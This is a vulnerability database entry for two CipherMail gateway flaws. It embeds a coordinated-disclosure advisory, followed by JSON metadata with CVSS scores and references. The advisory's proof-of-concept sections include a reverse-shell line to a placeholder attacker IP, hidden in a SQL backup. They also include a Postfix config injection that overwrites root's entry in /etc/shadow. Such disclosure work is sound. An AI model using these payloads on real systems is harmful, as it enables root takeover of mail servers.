VAR-202006-0395
Vulnerability from variot - Updated: 2023-12-18 13:33An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. CipherMail Gateway and Webmail Messenger Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. CipherMail Webmail Messenger is a CipherMail encrypted gateway's Webmail Add-ons. An attacker could exploit this vulnerability to elevate privileges to root . An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client. CipherMail Multiple Vulnerabilities
- Advisory Information
Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-0008
Advisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities
Date published: 2020-05-28
Date of last update: 2020-05-28
Vendors contacted: CipherMail
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2020-12713 , CVE-2020-12714
- Vulnerability Description
CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]
Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system.
-
Vulnerable Packages
CipherMail Community Virtual Appliance version 4.6.2.
Other products and versions might be affected, but have not yet been tested.
- Vendor Information, Solutions, and Workarounds
The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2
Patch instructions for older releases are also available.
- Credits
This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services.
The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team.
- Technical Description / Proof of Concept Code
CipherMail Community Virtual Appliance is an open souce virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services.
Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system. 7.1 Remote Command Execution Via Backup Restore
[CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator's role which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability.
The following proof of concept demonstrates the vulnerability:
-
First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files.
-
The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:
-- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64)
-- Host: localhost Database: djigzo
-- Server version 10.2.21-MariaDB
[...]
--
-- Dumping data for table cm_users
--
LOCK TABLES cm_users WRITE;
/!40000 ALTER TABLE cm_users DISABLE KEYS /;
INSERT INTO cm_users VALUES (1,'susucutrule@mailinator.com',5);
/!40000 ALTER TABLE cm_users ENABLE KEYS /;
UNLOCK TABLES;
/!40103 SET TIME_ZONE=@OLD_TIME_ZONE /;
/!40101 SET SQL_MODE=@OLD_SQL_MODE /; /!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS /; /!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS /; /!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT /; /!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS /; /!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION /; /!40111 SET SQL_NOTES=@OLD_SQL_NOTES /;
system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1 -- Dump completed on 2019-03-28 18:48:05
-
It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console.
-
Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server. 7.2 Configuration File Injection Leading to Code Execution as Root
[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s main.cf configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file.
The following proof of concept demonstrates the vulnerability:
The next four lines should be added in order to replace the root password in the system:
[main.cf Postfix configuration file] […] always_bcc = johnny@test.com multi_instance_enable=yes multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow multi_instance_directories=/tmp […]
After the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed.
In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command:
$ mkpasswd -m des Password: pentest KoVhDRK7oesZg
As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest.
It is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set.
- Report Timeline
2020-04-07 - Vulnerability discovered by CoreLabs.
2020-04-30 - First contact made with the vendor.
2020-04-30 - Answer received and advisory draft provided to CipherMail.
2020-04-30 - Vulnerabilities recognized by the vendor.
2020-05-21 - CVEs requested and received from Mitre.
2020-05-28 - Fix and release changes published by vendor.
2020-05-28 - Advisory published.
- References
[1] https://www.ciphermail.com/
[2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html
- About CoreLabs
CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.
11. About Core Security, A HelpSystems Company
Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com. 12. Disclaimer
The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0395",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "webmail messenger",
"scope": "gte",
"trust": 1.0,
"vendor": "ciphermail",
"version": "1.1.1"
},
{
"model": "webmail messenger",
"scope": "lte",
"trust": 1.0,
"vendor": "ciphermail",
"version": "3.1.1-0"
},
{
"model": "gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "ciphermail",
"version": "1.0.1"
},
{
"model": "gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "ciphermail",
"version": "4.7.1-0"
},
{
"model": "gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ciphermail",
"version": "1.0.1 \u304b\u3089 4.7.1-0"
},
{
"model": "webmail messenger",
"scope": "eq",
"trust": 0.8,
"vendor": "ciphermail",
"version": "1.1.1 \u304b\u3089 3.1.1-0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ciphermail:gateway:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.7.1-0",
"versionStartIncluding": "1.0.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ciphermail:webmail_messenger:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.1.1-0",
"versionStartIncluding": "1.1.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12713"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Catoira, Ivan Koiffman, Fernando Diaz",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
],
"trust": 0.6
},
"cve": "CVE-2020-12713",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-006804",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-165419",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-165420",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-006804",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-12713",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-006804",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-822",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-165419",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-165420",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. CipherMail Gateway and Webmail Messenger Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. CipherMail Webmail Messenger is a CipherMail encrypted gateway\u0027s Webmail Add-ons. An attacker could exploit this vulnerability to elevate privileges to root . An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client. CipherMail Multiple Vulnerabilities\n\n1. Advisory Information\n\nTitle: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities \nAdvisory ID: CORE-2020-0008\nAdvisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities\nDate published: 2020-05-28\nDate of last update: 2020-05-28\nVendors contacted: CipherMail\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2020-12713 , CVE-2020-12714\n\n3. Vulnerability Description\n\nCipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]\n\nTwo vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system. \n\n4. Vulnerable Packages\n\n CipherMail Community Virtual Appliance version 4.6.2. \n\nOther products and versions might be affected, but have not yet been tested. \n\n5. Vendor Information, Solutions, and Workarounds\n\nThe following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2\n\nPatch instructions for older releases are also available. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Iv\u00e1n Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services. \n\nThe publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team. \n\n7. Technical Description / Proof of Concept Code\n\nCipherMail Community Virtual Appliance is an open souce virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization\u0027s network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services. \n\nMultiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system. \n7.1 Remote Command Execution Via Backup Restore\n\n[CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator\u0027s role which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability. \n\nThe following proof of concept demonstrates the vulnerability:\n\n1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files. \n\n2. The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:\n\n-- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64)\n--\n-- Host: localhost Database: djigzo\n-- ------------------------------------------------------\n-- Server version\t10.2.21-MariaDB\n[...]\n--\n-- Dumping data for table `cm_users`\n--\n\nLOCK TABLES `cm_users` WRITE;\n/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;\nINSERT INTO `cm_users` VALUES (1,\u0027susucutrule@mailinator.com\u0027,5);\n/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;\nUNLOCK TABLES;\n/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n\n/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n\nsystem bash -i \u003e\u0026 /dev/tcp/[Attacker IP]/[Attacker Port] 0\u003e\u00261\n-- Dump completed on 2019-03-28 18:48:05\n\n3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console. \n\n4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server. \n7.2 Configuration File Injection Leading to Code Execution as Root\n\n[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator\u0027s role to manage Postfix. It is possible to edit Postfix\u2019s main.cf configuration file within the CipherMail Web Management console and add a \"BCC Address for all Messages\". This configuration parameter is written verbatim to the appliance\u0027s Postfix main.cf configuration file. \n\nThe following proof of concept demonstrates the vulnerability:\n\nThe next four lines should be added in order to replace the root password in the system:\n\n[main.cf Postfix configuration file]\n[\u2026]\n always_bcc = johnny@test.com\n multi_instance_enable=yes\n multi_instance_wrapper=sed -i /root:/c\\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow\n multi_instance_directories=/tmp \n[\u2026] \n\nAfter the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed. \n\nIn this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including \"\u003c\", \"\u003e\", \"|\", among others). To generate a password in DES using bash, we first executed the following command:\n\n$ mkpasswd -m des\n Password: pentest\n KoVhDRK7oesZg\n\nAs shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest. \n\nIt is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set. \n\n8. Report Timeline\n\n2020-04-07 - Vulnerability discovered by CoreLabs. \n\n2020-04-30 - First contact made with the vendor. \n\n2020-04-30 - Answer received and advisory draft provided to CipherMail. \n\n2020-04-30 - Vulnerabilities recognized by the vendor. \n\n2020-05-21 - CVEs requested and received from Mitre. \n\n2020-05-28 - Fix and release changes published by vendor. \n\n2020-05-28 - Advisory published. \n\n9. References\n\n[1] https://www.ciphermail.com/\n\n[2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html\n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs. \n11. About Core Security, A HelpSystems Company\n\nCore Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity \u0026 access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com. \n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com. \n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "PACKETSTORM",
"id": "158001"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-12713",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "158001",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-165419",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202006-821",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-165420",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "PACKETSTORM",
"id": "158001"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"id": "VAR-202006-0395",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
}
],
"trust": 0.02
},
"last_update_date": "2023-12-18T13:33:02.578000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Background info on CVE-2020-12713 \u0026 CVE-2020-12713",
"trust": 0.8,
"url": "https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html"
},
{
"title": "Email encryption gateway",
"trust": 0.8,
"url": "https://www.ciphermail.com/gateway.html"
},
{
"title": "CipherMail security advisory.",
"trust": 0.8,
"url": "https://www.ciphermail.com/news.html"
},
{
"title": "CipherMail Webmail Messenger",
"trust": 0.8,
"url": "https://www.ciphermail.com/secure-webmail.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-269",
"trust": 1.9
},
{
"problemtype": "CWE-326",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/158001/ciphermail-community-virtual-appliance-4.6.2-code-execution.html"
},
{
"trust": 1.9,
"url": "https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html"
},
{
"trust": 1.9,
"url": "https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://www.ciphermail.com/gateway.html"
},
{
"trust": 1.8,
"url": "https://www.ciphermail.com/news.html"
},
{
"trust": 1.8,
"url": "https://www.ciphermail.com/secure-webmail.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12713"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12713"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12714"
},
{
"trust": 0.1,
"url": "https://www.coresecurity.com/core-labs."
},
{
"trust": 0.1,
"url": "https://www.ciphermail.com/"
},
{
"trust": 0.1,
"url": "https://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "PACKETSTORM",
"id": "158001"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-165419"
},
{
"db": "VULHUB",
"id": "VHN-165420"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"db": "PACKETSTORM",
"id": "158001"
},
{
"db": "NVD",
"id": "CVE-2020-12713"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-822"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-11T00:00:00",
"db": "VULHUB",
"id": "VHN-165419"
},
{
"date": "2020-06-11T00:00:00",
"db": "VULHUB",
"id": "VHN-165420"
},
{
"date": "2020-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006804"
},
{
"date": "2020-06-09T19:45:24",
"db": "PACKETSTORM",
"id": "158001"
},
{
"date": "2020-06-11T02:15:10.477000",
